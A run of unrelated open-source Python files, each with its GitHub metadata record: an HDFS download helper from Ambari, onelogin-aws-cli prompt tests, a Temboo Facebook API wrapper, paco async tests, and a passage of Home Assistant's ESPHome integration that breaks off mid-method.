contents += "\nsave_as: "+html_filename
contents += "\n\n"
for linkname,link in zip(links.keys(),links.values()):
#contents += "[" + linkname + "](" + link + ")"
contents += '<a class="btn btn-large btn-primary" href="'+link+'">'+linkname+'</a>'
contents += "\n"
contents += "\n\n"
with open(md_filename,'w') as f:
f.write(contents)
print "Finished writing markdown file ",md_filename
|
{
"content_hash": "5c0c965614c544f540d09dfdb8e22f2c",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 87,
"avg_line_length": 26.880597014925375,
"alnum_prop": 0.5308162132148806,
"repo_name": "charlesreid1/wordswordswords",
"id": "3c9cd492fc5115c76403751fd7542808ec23e6ce",
"size": "1801",
"binary": false,
"copies": "1",
"ref": "refs/heads/pelican",
"path": "pelican/content/pages/make_dubliners.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "51931"
},
{
"name": "HTML",
"bytes": "63504291"
},
{
"name": "Python",
"bytes": "65994"
},
{
"name": "Ruby",
"bytes": "207"
},
{
"name": "Shell",
"bytes": "165"
}
],
"symlink_target": ""
}
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__all__ = ["download_from_hdfs", ]
import os
import uuid
import tempfile
import re
from resource_management.libraries.script.script import Script
from resource_management.libraries.resources.hdfs_resource import HdfsResource
from resource_management.libraries.functions.default import default
from resource_management.core import shell
from resource_management.core.logger import Logger
def download_from_hdfs(source_file, dest_path, user_group, owner, download_type="file", file_mode=0444, force_execute=False,
replace_existing_files=False):
"""
:param source_file: the source file path
:param dest_path: the destination path
:param user_group: Group to own the directory.
:param owner: File owner
:param download_type: file or directory
:param file_mode: File permission
:param force_execute: If true, will execute the HDFS commands immediately, otherwise, will defer to the calling function.
:param replace_existing_files: If true, will replace existing files even if they are the same size
:return: Will return True if successful, otherwise, False.
"""
import params
Logger.info("Called download_from_hdfs source in HDFS: {0} , local destination path: {1}".format(source_file, dest_path))
# The destination directory must already exist
if not os.path.exists(dest_path):
Logger.error("Cannot copy {0} because destination directory {1} does not exist.".format(source_file, dest_path))
return False
filename = os.path.basename(source_file)
dest_file = os.path.join(dest_path, filename)
params.HdfsResource(dest_file,
type=download_type,
action="download_on_execute",
source=source_file,
group=user_group,
owner=owner,
mode=file_mode,
replace_existing_files=replace_existing_files,
)
Logger.info("Will attempt to copy from DFS at {0} to local file system {1}.".format(source_file, dest_file))
# For improved performance, force_execute should be False so that it is delayed and combined with other calls.
if force_execute:
params.HdfsResource(None, action="execute")
return True
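# Hedged usage sketch (editor's addition): a typical call from a service
# script. The HDFS and local paths, ownership and mode below are illustrative;
# the `params` module imported above must supply the HdfsResource wrapper.
#
#     download_from_hdfs('/apps/myservice/myservice.tar.gz',
#                        '/usr/lib/myservice/files',
#                        user_group='hadoop',
#                        owner='myservice',
#                        download_type='file',
#                        file_mode=0644,
#                        force_execute=True)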
|
{
"content_hash": "5f323f7df69c02bec1e28f17bc3583eb",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 124,
"avg_line_length": 39.86666666666667,
"alnum_prop": 0.7244147157190636,
"repo_name": "sekikn/ambari",
"id": "5826fc1e8abbc38492bf031e07d25f6875c9f537",
"size": "3012",
"binary": false,
"copies": "5",
"ref": "refs/heads/trunk",
"path": "ambari-common/src/main/python/resource_management/libraries/functions/download_from_hdfs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "22734"
},
{
"name": "C",
"bytes": "109499"
},
{
"name": "C#",
"bytes": "182799"
},
{
"name": "CSS",
"bytes": "616806"
},
{
"name": "CoffeeScript",
"bytes": "4323"
},
{
"name": "Dockerfile",
"bytes": "8117"
},
{
"name": "HTML",
"bytes": "3725781"
},
{
"name": "Handlebars",
"bytes": "1594385"
},
{
"name": "Java",
"bytes": "26670585"
},
{
"name": "JavaScript",
"bytes": "14647486"
},
{
"name": "Jinja",
"bytes": "147938"
},
{
"name": "Less",
"bytes": "303080"
},
{
"name": "Makefile",
"bytes": "2407"
},
{
"name": "PHP",
"bytes": "149648"
},
{
"name": "PLpgSQL",
"bytes": "298247"
},
{
"name": "PowerShell",
"bytes": "2047735"
},
{
"name": "Python",
"bytes": "7226684"
},
{
"name": "R",
"bytes": "1457"
},
{
"name": "Shell",
"bytes": "350773"
},
{
"name": "TSQL",
"bytes": "42351"
},
{
"name": "Vim Script",
"bytes": "5813"
},
{
"name": "sed",
"bytes": "1133"
}
],
"symlink_target": ""
}
|
import contextlib
from unittest import TestCase
from unittest.mock import patch
from io import StringIO
from onelogin_aws_cli.userquery import user_choice, user_role_prompt
class TestUser_choice(TestCase):
def test_user_choice(self):
mock_stdout = StringIO()
with patch('builtins.input', side_effect=['2']):
with contextlib.redirect_stdout(mock_stdout):
result = user_choice('one', ['hallo', 'world', 'foobar'])
output = mock_stdout.getvalue()
assert result == "world"
assert "Invalid option" not in output
def test_user_choice_bad(self):
mock_stdout = StringIO()
with patch('builtins.input', side_effect=['bar', '2']):
with contextlib.redirect_stdout(mock_stdout):
result = user_choice('one', ['hallo', 'world', 'foo'])
output = mock_stdout.getvalue()
assert result == "world"
assert "Invalid option" in output
def test_user_choice_no_options(self):
with self.assertRaises(Exception):
user_choice('one', [])
def test_user_choice_one_option(self):
result = user_choice('one', ['foo'])
self.assertEqual('foo', result)
def test_user_choice_preselected(self):
result = user_choice('one', ['foo', 'bar'], saved_choice='bar')
self.assertEqual('bar', result)
def test_user_choice_bad_preselected(self):
mock_stdout = StringIO()
with patch('builtins.input', side_effect=['2']):
with contextlib.redirect_stdout(mock_stdout):
result = user_choice('one', ['foo', 'bar'], saved_choice='baz')
output = mock_stdout.getvalue()
assert result == "bar"
assert "Invalid option" not in output
assert "Ignoring invalid saved choice" in output
def test_user_role_prompt(self):
mock_stdout = StringIO()
with patch('builtins.input', side_effect=['2']):
with contextlib.redirect_stdout(mock_stdout):
selected_role = user_role_prompt([
('mock_role1', 'mock_principal_1'),
('mock_role2', 'mock_principal_2'),
('mock_role3', 'mock_principal_3')
])
self.assertEqual(('mock_role2', 'mock_principal_2'), selected_role)
self.assertEqual("""Pick a role:
[1] mock_role1
[2] mock_role2
[3] mock_role3
""", mock_stdout.getvalue())
def test_user_role_prompt_one_option(self):
selected_role = user_role_prompt([
('mock_role1', 'mock_principal_1'),
])
self.assertEqual(('mock_role1', 'mock_principal_1'), selected_role)
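# Hedged usage sketch (editor's addition): outside the test suite, user_choice
# prints a numbered menu and returns the selected option; it short-circuits
# when only one option exists or when a valid saved_choice is supplied. The
# option names below are illustrative.
if __name__ == '__main__':
    print(user_choice('profile', ['dev', 'staging', 'prod'], saved_choice='dev'))
    # prints 'dev' immediately, per the preselected-choice behaviour tested above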
|
{
"content_hash": "0892dc57d9af9ddb3154b76b0ac04c23",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 79,
"avg_line_length": 32.97530864197531,
"alnum_prop": 0.593036315986522,
"repo_name": "healthcoda/onelogin-aws-cli",
"id": "4b4d5d1ac0d41554ab473eee0a530e37d35e986f",
"size": "2671",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "onelogin_aws_cli/tests/test_userquery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8755"
}
],
"symlink_target": ""
}
|
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteListen(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the DeleteListen Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(DeleteListen, self).__init__(temboo_session, '/Library/Facebook/Actions/Music/Listens/DeleteListen')
def new_input_set(self):
return DeleteListenInputSet()
def _make_result_set(self, result, path):
return DeleteListenResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return DeleteListenChoreographyExecution(session, exec_id, path)
class DeleteListenInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the DeleteListen
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved from the final step of the OAuth process.)
"""
super(DeleteListenInputSet, self)._set_input('AccessToken', value)
def set_ActionID(self, value):
"""
Set the value of the ActionID input for this Choreo. ((required, string) The id of an action to delete.)
"""
super(DeleteListenInputSet, self)._set_input('ActionID', value)
class DeleteListenResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the DeleteListen Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((boolean) The response from Facebook. Returns "true" on success.)
"""
return self._output.get('Response', None)
class DeleteListenChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return DeleteListenResultSet(response, path)
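# Hedged usage sketch (editor's addition): the usual Temboo execution flow for
# this Choreo. The session credentials and action id below are placeholders,
# and execute_with_results is assumed to be the standard Temboo SDK entry point.
#
#     from temboo.core.session import TembooSession
#     session = TembooSession('ACCOUNT', 'APP_KEY_NAME', 'APP_KEY_VALUE')
#     choreo = DeleteListen(session)
#     inputs = choreo.new_input_set()
#     inputs.set_AccessToken('<facebook-access-token>')
#     inputs.set_ActionID('<action-id>')
#     results = choreo.execute_with_results(inputs)
#     print(results.get_Response())  # "true" on success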
|
{
"content_hash": "6c220fa6cc9571c56d2036301398bf06",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 153,
"avg_line_length": 38.80327868852459,
"alnum_prop": 0.7051119560625264,
"repo_name": "lupyuen/RaspberryPiImage",
"id": "3d8890ac8f3e833512f0483025eb64e0e8dcfaae",
"size": "3215",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "home/pi/GrovePi/Software/Python/others/temboo/Library/Facebook/Actions/Music/Listens/DeleteListen.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Arduino",
"bytes": "82308"
},
{
"name": "C",
"bytes": "3197439"
},
{
"name": "C#",
"bytes": "33056"
},
{
"name": "C++",
"bytes": "1020255"
},
{
"name": "CSS",
"bytes": "208338"
},
{
"name": "CoffeeScript",
"bytes": "87200"
},
{
"name": "Eagle",
"bytes": "1632170"
},
{
"name": "Go",
"bytes": "3646"
},
{
"name": "Groff",
"bytes": "286691"
},
{
"name": "HTML",
"bytes": "41527"
},
{
"name": "JavaScript",
"bytes": "403603"
},
{
"name": "Makefile",
"bytes": "33808"
},
{
"name": "Objective-C",
"bytes": "69457"
},
{
"name": "Perl",
"bytes": "96047"
},
{
"name": "Processing",
"bytes": "1304"
},
{
"name": "Python",
"bytes": "13358098"
},
{
"name": "Shell",
"bytes": "68795"
},
{
"name": "TeX",
"bytes": "4317"
}
],
"symlink_target": ""
}
|
import time
import pytest
import asyncio
from paco import wait
from .helpers import run_in_loop
@asyncio.coroutine
def coro(num):
yield from asyncio.sleep(0.1)
return num * 2
def test_wait(limit=0):
done, pending = run_in_loop(wait([coro(1), coro(2), coro(3)], limit=limit))
assert len(done) == 3
assert len(pending) == 0
for future in done:
assert future.result() < 7
def test_wait_sequential():
start = time.time()
test_wait(limit=1)
assert time.time() - start >= 0.3
def test_wait_return_exceptions():
@asyncio.coroutine
def coro(num):
raise ValueError('foo')
done, pending = run_in_loop(wait([coro(1), coro(2), coro(3)],
return_exceptions=True))
assert len(done) == 3
assert len(pending) == 0
for future in done:
assert str(future.result()) == 'foo'
def test_wait_empty():
with pytest.raises(ValueError):
run_in_loop(wait([]))
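# Hedged usage sketch (editor's addition): wait() mirrors asyncio.wait but adds
# an optional concurrency limit and exception capture; with limit=1 the three
# coroutines above run back to back, which is what test_wait_sequential times.
if __name__ == '__main__':
    done, pending = run_in_loop(wait([coro(1), coro(2), coro(3)], limit=2))
    print(sorted(f.result() for f in done))  # [2, 4, 6]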
|
{
"content_hash": "967a731d1aa82b83eeecfe584be8876e",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 79,
"avg_line_length": 21.6,
"alnum_prop": 0.6100823045267489,
"repo_name": "h2non/paco",
"id": "dd71d32d6c81123679f1f9f46e98d6ce7f95f30d",
"size": "996",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/wait_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1421"
},
{
"name": "Python",
"bytes": "130516"
}
],
"symlink_target": ""
}
|
"""Support for esphome devices."""
from __future__ import annotations
from collections.abc import Callable
import functools
import logging
import math
from typing import Any, Generic, NamedTuple, TypeVar, cast, overload
from aioesphomeapi import (
APIClient,
APIConnectionError,
APIIntEnum,
APIVersion,
BadNameAPIError,
DeviceInfo as EsphomeDeviceInfo,
EntityCategory as EsphomeEntityCategory,
EntityInfo,
EntityState,
HomeassistantServiceCall,
InvalidEncryptionKeyAPIError,
ReconnectLogic,
RequiresEncryptionAPIError,
UserService,
UserServiceArgType,
)
import voluptuous as vol
from homeassistant import const
from homeassistant.components import zeroconf
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_DEVICE_ID,
CONF_HOST,
CONF_MODE,
CONF_PASSWORD,
CONF_PORT,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import Event, HomeAssistant, ServiceCall, State, callback
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
import homeassistant.helpers.device_registry as dr
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import DeviceInfo, Entity, EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.event import async_track_state_change_event
from homeassistant.helpers.service import async_set_service_schema
from homeassistant.helpers.template import Template
from .bluetooth import async_connect_scanner
from .domain_data import DOMAIN, DomainData
# Import config flow so that it's added to the registry
from .entry_data import RuntimeEntryData
CONF_NOISE_PSK = "noise_psk"
_LOGGER = logging.getLogger(__name__)
_R = TypeVar("_R")
async def async_setup_entry( # noqa: C901
hass: HomeAssistant, entry: ConfigEntry
) -> bool:
"""Set up the esphome component."""
host = entry.data[CONF_HOST]
port = entry.data[CONF_PORT]
password = entry.data[CONF_PASSWORD]
noise_psk = entry.data.get(CONF_NOISE_PSK)
device_id: str | None = None
zeroconf_instance = await zeroconf.async_get_instance(hass)
cli = APIClient(
host,
port,
password,
client_info=f"Home Assistant {const.__version__}",
zeroconf_instance=zeroconf_instance,
noise_psk=noise_psk,
)
domain_data = DomainData.get(hass)
entry_data = RuntimeEntryData(
client=cli,
entry_id=entry.entry_id,
store=domain_data.get_or_create_store(hass, entry),
)
domain_data.set_entry_data(entry, entry_data)
async def on_stop(event: Event) -> None:
"""Cleanup the socket client on HA stop."""
await _cleanup_instance(hass, entry)
# Use async_listen instead of async_listen_once so that we don't deregister
# the callback twice when shutting down Home Assistant.
# "Unable to remove unknown listener <function EventBus.async_listen_once.<locals>.onetime_listener>"
entry_data.cleanup_callbacks.append(
hass.bus.async_listen(EVENT_HOMEASSISTANT_STOP, on_stop)
)
@callback
def async_on_service_call(service: HomeassistantServiceCall) -> None:
"""Call service when user automation in ESPHome config is triggered."""
domain, service_name = service.service.split(".", 1)
service_data = service.data
if service.data_template:
try:
data_template = {
key: Template(value) # type: ignore[no-untyped-call]
for key, value in service.data_template.items()
}
template.attach(hass, data_template)
service_data.update(
template.render_complex(data_template, service.variables)
)
except TemplateError as ex:
_LOGGER.error("Error rendering data template for %s: %s", host, ex)
return
if service.is_event:
# ESPHome uses servicecall packet for both events and service calls
# Ensure the user can only send events of form 'esphome.xyz'
if domain != "esphome":
_LOGGER.error(
"Can only generate events under esphome domain! (%s)", host
)
return
# Call native tag scan
if service_name == "tag_scanned" and device_id is not None:
# Importing tag via hass.components in case it is overridden
# in a custom_components (custom_components.tag)
tag = hass.components.tag
tag_id = service_data["tag_id"]
hass.async_create_task(tag.async_scan_tag(tag_id, device_id))
return
hass.bus.async_fire(
service.service,
{
ATTR_DEVICE_ID: device_id,
**service_data,
},
)
else:
hass.async_create_task(
hass.services.async_call(
domain, service_name, service_data, blocking=True
)
)
async def _send_home_assistant_state(
entity_id: str, attribute: str | None, state: State | None
) -> None:
"""Forward Home Assistant states to ESPHome."""
if state is None or (attribute and attribute not in state.attributes):
return
send_state = state.state
if attribute:
attr_val = state.attributes[attribute]
# ESPHome only handles "on"/"off" for boolean values
if isinstance(attr_val, bool):
send_state = "on" if attr_val else "off"
else:
send_state = attr_val
await cli.send_home_assistant_state(entity_id, attribute, str(send_state))
@callback
def async_on_state_subscription(
entity_id: str, attribute: str | None = None
) -> None:
"""Subscribe and forward states for requested entities."""
async def send_home_assistant_state_event(event: Event) -> None:
"""Forward Home Assistant states updates to ESPHome."""
# Only communicate changes to the state or attribute tracked
if event.data.get("new_state") is None or (
event.data.get("old_state") is not None
and "new_state" in event.data
and (
(
not attribute
and event.data["old_state"].state
== event.data["new_state"].state
)
or (
attribute
and attribute in event.data["old_state"].attributes
and attribute in event.data["new_state"].attributes
and event.data["old_state"].attributes[attribute]
== event.data["new_state"].attributes[attribute]
)
)
):
return
await _send_home_assistant_state(
event.data["entity_id"], attribute, event.data.get("new_state")
)
unsub = async_track_state_change_event(
hass, [entity_id], send_home_assistant_state_event
)
entry_data.disconnect_callbacks.append(unsub)
# Send initial state
hass.async_create_task(
_send_home_assistant_state(entity_id, attribute, hass.states.get(entity_id))
)
async def on_connect() -> None:
"""Subscribe to states and list entities on successful API login."""
nonlocal device_id
try:
entry_data.device_info = await cli.device_info()
assert cli.api_version is not None
entry_data.api_version = cli.api_version
entry_data.available = True
if entry_data.device_info.name:
cli.expected_name = entry_data.device_info.name
reconnect_logic.name = entry_data.device_info.name
device_id = _async_setup_device_registry(
hass, entry, entry_data.device_info
)
entry_data.async_update_device_state(hass)
entity_infos, services = await cli.list_entities_services()
await entry_data.async_update_static_infos(hass, entry, entity_infos)
await _setup_services(hass, entry_data, services)
await cli.subscribe_states(entry_data.async_update_state)
await cli.subscribe_service_calls(async_on_service_call)
await cli.subscribe_home_assistant_states(async_on_state_subscription)
if entry_data.device_info.bluetooth_proxy_version:
entry_data.disconnect_callbacks.append(
await async_connect_scanner(hass, entry, cli, entry_data)
)
hass.async_create_task(entry_data.async_save_to_store())
except APIConnectionError as err:
_LOGGER.warning("Error getting initial data for %s: %s", host, err)
# Re-connection logic will trigger after this
await cli.disconnect()
async def on_disconnect() -> None:
"""Run disconnect callbacks on API disconnect."""
name = entry_data.device_info.name if entry_data.device_info else host
_LOGGER.debug("%s: %s disconnected, running disconnected callbacks", name, host)
for disconnect_cb in entry_data.disconnect_callbacks:
disconnect_cb()
entry_data.disconnect_callbacks = []
entry_data.available = False
entry_data.async_update_device_state(hass)
async def on_connect_error(err: Exception) -> None:
"""Start reauth flow if appropriate connect error type."""
if isinstance(err, (RequiresEncryptionAPIError, InvalidEncryptionKeyAPIError)):
entry.async_start_reauth(hass)
if isinstance(err, BadNameAPIError):
_LOGGER.warning(
"Name of device %s changed to %s, potentially due to IP reassignment",
cli.expected_name,
err.received_name,
)
reconnect_logic = ReconnectLogic(
client=cli,
on_connect=on_connect,
on_disconnect=on_disconnect,
zeroconf_instance=zeroconf_instance,
name=host,
on_connect_error=on_connect_error,
)
infos, services = await entry_data.async_load_from_store()
await entry_data.async_update_static_infos(hass, entry, infos)
await _setup_services(hass, entry_data, services)
if entry_data.device_info is not None and entry_data.device_info.name:
cli.expected_name = entry_data.device_info.name
reconnect_logic.name = entry_data.device_info.name
if entry.unique_id is None:
hass.config_entries.async_update_entry(
entry, unique_id=entry_data.device_info.name
)
await reconnect_logic.start()
entry_data.cleanup_callbacks.append(reconnect_logic.stop_callback)
return True
@callback
def _async_setup_device_registry(
hass: HomeAssistant, entry: ConfigEntry, device_info: EsphomeDeviceInfo
) -> str:
"""Set up device registry feature for a particular config entry."""
sw_version = device_info.esphome_version
if device_info.compilation_time:
sw_version += f" ({device_info.compilation_time})"
configuration_url = None
if device_info.webserver_port > 0:
configuration_url = f"http://{entry.data['host']}:{device_info.webserver_port}"
manufacturer = "espressif"
if device_info.manufacturer:
manufacturer = device_info.manufacturer
model = device_info.model
hw_version = None
if device_info.project_name:
project_name = device_info.project_name.split(".")
manufacturer = project_name[0]
model = project_name[1]
hw_version = device_info.project_version
device_registry = dr.async_get(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=entry.entry_id,
configuration_url=configuration_url,
connections={(dr.CONNECTION_NETWORK_MAC, device_info.mac_address)},
name=device_info.name,
manufacturer=manufacturer,
model=model,
sw_version=sw_version,
hw_version=hw_version,
)
return device_entry.id
class ServiceMetadata(NamedTuple):
"""Metadata for services."""
validator: Any
example: str
selector: dict[str, Any]
description: str | None = None
ARG_TYPE_METADATA = {
UserServiceArgType.BOOL: ServiceMetadata(
validator=cv.boolean,
example="False",
selector={"boolean": None},
),
UserServiceArgType.INT: ServiceMetadata(
validator=vol.Coerce(int),
example="42",
selector={"number": {CONF_MODE: "box"}},
),
UserServiceArgType.FLOAT: ServiceMetadata(
validator=vol.Coerce(float),
example="12.3",
selector={"number": {CONF_MODE: "box", "step": 1e-3}},
),
UserServiceArgType.STRING: ServiceMetadata(
validator=cv.string,
example="Example text",
selector={"text": None},
),
UserServiceArgType.BOOL_ARRAY: ServiceMetadata(
validator=[cv.boolean],
description="A list of boolean values.",
example="[True, False]",
selector={"object": {}},
),
UserServiceArgType.INT_ARRAY: ServiceMetadata(
validator=[vol.Coerce(int)],
description="A list of integer values.",
example="[42, 34]",
selector={"object": {}},
),
UserServiceArgType.FLOAT_ARRAY: ServiceMetadata(
validator=[vol.Coerce(float)],
description="A list of floating point numbers.",
example="[ 12.3, 34.5 ]",
selector={"object": {}},
),
UserServiceArgType.STRING_ARRAY: ServiceMetadata(
validator=[cv.string],
description="A list of strings.",
example="['Example text', 'Another example']",
selector={"object": {}},
),
}
async def _register_service(
hass: HomeAssistant, entry_data: RuntimeEntryData, service: UserService
) -> None:
if entry_data.device_info is None:
raise ValueError("Device Info needs to be fetched first")
service_name = f"{entry_data.device_info.name.replace('-', '_')}_{service.name}"
schema = {}
fields = {}
for arg in service.args:
if arg.type not in ARG_TYPE_METADATA:
_LOGGER.error(
"Can't register service %s because %s is of unknown type %s",
service_name,
arg.name,
arg.type,
)
return
metadata = ARG_TYPE_METADATA[arg.type]
schema[vol.Required(arg.name)] = metadata.validator
fields[arg.name] = {
"name": arg.name,
"required": True,
"description": metadata.description,
"example": metadata.example,
"selector": metadata.selector,
}
async def execute_service(call: ServiceCall) -> None:
await entry_data.client.execute_service(service, call.data)
hass.services.async_register(
DOMAIN, service_name, execute_service, vol.Schema(schema)
)
service_desc = {
"description": f"Calls the service {service.name} of the node {entry_data.device_info.name}",
"fields": fields,
}
async_set_service_schema(hass, DOMAIN, service_name, service_desc)
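# Illustration only (hedged, not part of the original module): for a hypothetical
# node named "garden-node" exposing a user service "start_effect" with a single
# string argument "effect_name", the code above registers the Home Assistant
# service "esphome.garden_node_start_effect", which could then be invoked as:
#
#     service: esphome.garden_node_start_effect
#     data:
#       effect_name: "rainbow"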
async def _setup_services(
hass: HomeAssistant, entry_data: RuntimeEntryData, services: list[UserService]
) -> None:
if entry_data.device_info is None:
# Can happen if device has never connected or .storage cleared
return
old_services = entry_data.services.copy()
to_unregister = []
to_register = []
for service in services:
if service.key in old_services:
# Already exists
if (matching := old_services.pop(service.key)) != service:
# Need to re-register
to_unregister.append(matching)
to_register.append(service)
else:
# New service
to_register.append(service)
for service in old_services.values():
to_unregister.append(service)
entry_data.services = {serv.key: serv for serv in services}
for service in to_unregister:
service_name = f"{entry_data.device_info.name}_{service.name}"
hass.services.async_remove(DOMAIN, service_name)
for service in to_register:
await _register_service(hass, entry_data, service)
async def _cleanup_instance(
hass: HomeAssistant, entry: ConfigEntry
) -> RuntimeEntryData:
"""Cleanup the esphome client if it exists."""
domain_data = DomainData.get(hass)
data = domain_data.pop_entry_data(entry)
data.available = False
for disconnect_cb in data.disconnect_callbacks:
disconnect_cb()
data.disconnect_callbacks = []
for cleanup_callback in data.cleanup_callbacks:
cleanup_callback()
await data.client.disconnect()
return data
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload an esphome config entry."""
entry_data = await _cleanup_instance(hass, entry)
return await hass.config_entries.async_unload_platforms(
entry, entry_data.loaded_platforms
)
async def async_remove_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Remove an esphome config entry."""
await DomainData.get(hass).get_or_create_store(hass, entry).async_remove()
_InfoT = TypeVar("_InfoT", bound=EntityInfo)
_EntityT = TypeVar("_EntityT", bound="EsphomeEntity[Any,Any]")
_StateT = TypeVar("_StateT", bound=EntityState)
async def platform_async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
*,
component_key: str,
info_type: type[_InfoT],
entity_type: type[_EntityT],
state_type: type[_StateT],
) -> None:
"""Set up an esphome platform.
This method is in charge of receiving, distributing and storing
info and state updates.
"""
entry_data: RuntimeEntryData = DomainData.get(hass).get_entry_data(entry)
entry_data.info[component_key] = {}
entry_data.old_info[component_key] = {}
entry_data.state.setdefault(state_type, {})
@callback
def async_list_entities(infos: list[EntityInfo]) -> None:
"""Update entities of this platform when entities are listed."""
old_infos = entry_data.info[component_key]
new_infos: dict[int, EntityInfo] = {}
add_entities: list[_EntityT] = []
for info in infos:
if not isinstance(info, info_type):
# Filter out infos that don't belong to this platform.
continue
if info.key in old_infos:
# Update existing entity
old_infos.pop(info.key)
else:
# Create new entity
entity = entity_type(entry_data, component_key, info.key, state_type)
add_entities.append(entity)
new_infos[info.key] = info
# Remove old entities
for info in old_infos.values():
entry_data.async_remove_entity(hass, component_key, info.key)
# First copy the now-old info into the backup object
entry_data.old_info[component_key] = entry_data.info[component_key]
# Then update the actual info
entry_data.info[component_key] = new_infos
# Add entities to Home Assistant
async_add_entities(add_entities)
signal = f"esphome_{entry.entry_id}_on_list"
entry_data.cleanup_callbacks.append(
async_dispatcher_connect(hass, signal, async_list_entities)
)
def esphome_state_property(
func: Callable[[_EntityT], _R]
) -> Callable[[_EntityT], _R | None]:
"""Wrap a state property of an esphome entity.
This checks if the state object in the entity is set, and
prevents writing NAN values to the Home Assistant state machine.
"""
@functools.wraps(func)
def _wrapper(self: _EntityT) -> _R | None:
# pylint: disable-next=protected-access
if not self._has_state:
return None
val = func(self)
if isinstance(val, float) and math.isnan(val):
# Home Assistant doesn't use NAN values in state machine
# (not JSON serializable)
return None
return val
return _wrapper
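# Illustrative sketch (hypothetical names, not part of the original file): a
# platform entity would typically stack the decorator under @property so that
# missing state and NAN values are reported as None:
#
#     class MySensor(EsphomeEntity[SensorInfo, SensorState]):
#         @property
#         @esphome_state_property
#         def native_value(self) -> float | None:
#             # Only reached when a state object exists for this key.
#             return self._state.state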
_EnumT = TypeVar("_EnumT", bound=APIIntEnum)
_ValT = TypeVar("_ValT")
class EsphomeEnumMapper(Generic[_EnumT, _ValT]):
"""Helper class to convert between hass and esphome enum values."""
def __init__(self, mapping: dict[_EnumT, _ValT]) -> None:
"""Construct a EsphomeEnumMapper."""
# Add none mapping
augmented_mapping: dict[_EnumT | None, _ValT | None] = mapping # type: ignore[assignment]
augmented_mapping[None] = None
self._mapping = augmented_mapping
self._inverse: dict[_ValT, _EnumT] = {v: k for k, v in mapping.items()}
@overload
def from_esphome(self, value: _EnumT) -> _ValT:
...
@overload
def from_esphome(self, value: _EnumT | None) -> _ValT | None:
...
def from_esphome(self, value: _EnumT | None) -> _ValT | None:
"""Convert from an esphome int representation to a hass string."""
return self._mapping[value]
def from_hass(self, value: _ValT) -> _EnumT:
"""Convert from a hass string to a esphome int representation."""
return self._inverse[value]
ICON_SCHEMA = vol.Schema(cv.icon)
ENTITY_CATEGORIES: EsphomeEnumMapper[
EsphomeEntityCategory, EntityCategory | None
] = EsphomeEnumMapper(
{
EsphomeEntityCategory.NONE: None,
EsphomeEntityCategory.CONFIG: EntityCategory.CONFIG,
EsphomeEntityCategory.DIAGNOSTIC: EntityCategory.DIAGNOSTIC,
}
)
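# Usage illustration (derived from the mapping above, not in the original
# source): the mapper translates in both directions, e.g.
#
#     ENTITY_CATEGORIES.from_esphome(EsphomeEntityCategory.CONFIG)
#     # -> EntityCategory.CONFIG
#     ENTITY_CATEGORIES.from_hass(EntityCategory.DIAGNOSTIC)
#     # -> EsphomeEntityCategory.DIAGNOSTIC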
class EsphomeEntity(Entity, Generic[_InfoT, _StateT]):
"""Define a base esphome entity."""
_attr_should_poll = False
def __init__(
self,
entry_data: RuntimeEntryData,
component_key: str,
key: int,
state_type: type[_StateT],
) -> None:
"""Initialize."""
self._entry_data = entry_data
self._component_key = component_key
self._key = key
self._state_type = state_type
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
self.async_on_remove(
async_dispatcher_connect(
self.hass,
(
f"esphome_{self._entry_id}_remove_"
f"{self._component_key}_{self._key}"
),
functools.partial(self.async_remove, force_remove=True),
)
)
self.async_on_remove(
async_dispatcher_connect(
self.hass,
f"esphome_{self._entry_id}_on_device_update",
self._on_device_update,
)
)
self.async_on_remove(
self._entry_data.async_subscribe_state_update(
self._state_type, self._key, self._on_state_update
)
)
@callback
def _on_state_update(self) -> None:
